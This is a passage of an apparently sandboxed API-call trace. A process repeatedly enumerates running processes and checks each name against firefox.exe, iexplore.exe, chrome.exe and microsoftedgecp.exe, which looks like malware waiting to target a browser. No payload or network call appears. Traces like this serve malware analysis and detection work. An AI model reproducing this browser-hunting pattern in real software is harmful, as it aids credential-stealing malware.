cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0182.361] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0182.361] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0182.361] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0182.361] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.361] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0182.362] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0182.362] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0182.362] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0182.362] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.362] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0182.362] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0182.362] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0182.362] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0182.362] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.362] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0182.363] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0182.363] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0182.363] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0182.363] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.363] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0182.363] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0182.363] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0182.363] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0182.363] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.363] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0182.364] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0182.364] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0182.364] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0182.364] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.364] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0182.364] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0182.364] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0182.364] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0182.364] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.364] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0182.365] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0182.365] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0182.365] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0182.365] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.365] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0182.365] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0182.365] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0182.366] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0182.366] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.366] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0182.368] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0182.368] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0182.368] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0182.368] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.368] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0182.368] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0182.368] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0182.368] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0182.368] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.368] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0182.369] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0182.369] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0182.369] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0182.369] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.369] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0182.369] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0182.370] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0182.370] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0182.370] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.370] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0182.370] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0182.370] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0182.370] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0182.370] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.370] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0182.371] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0182.371] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0182.371] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0182.371] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.371] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.371] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0182.371] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0182.371] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0182.371] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.371] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.372] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.372] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.372] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.372] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.372] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0182.372] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0182.372] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0182.372] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0182.372] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.372] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.373] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.373] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.373] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.373] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.373] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0182.373] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0182.373] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0182.373] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0182.374] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.374] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.374] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.374] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.374] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.374] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.374] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.375] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.375] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.375] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.375] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.375] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0182.375] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0182.375] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0182.375] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0182.375] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.375] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.376] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0182.376] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0182.376] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0182.376] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.376] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.376] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.376] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.376] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.376] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.376] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.377] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.377] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.377] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.377] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.377] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.377] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.377] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.378] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.378] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.378] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.378] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.378] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.378] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.378] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.378] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0182.379] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0182.379] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0182.379] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0182.379] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0182.379] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0182.379] CloseHandle (hObject=0xd4) returned 1 [0182.379] Sleep (dwMilliseconds=0x3e8) [0183.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0183.389] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.389] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0183.389] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0183.389] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0183.389] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0183.389] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.390] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0183.390] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0183.390] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0183.390] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0183.390] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.390] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0183.390] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0183.390] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0183.390] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.390] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.391] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0183.391] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0183.391] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0183.391] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.391] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.391] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0183.391] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0183.391] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0183.391] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.391] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.392] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0183.392] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0183.392] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0183.392] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.392] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.393] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0183.393] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0183.393] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0183.393] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.393] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.393] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0183.393] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0183.393] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0183.393] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.393] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.394] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0183.394] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0183.394] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0183.394] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.394] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0183.394] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0183.394] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0183.394] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0183.394] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.394] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.395] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.395] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.395] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.395] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.395] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 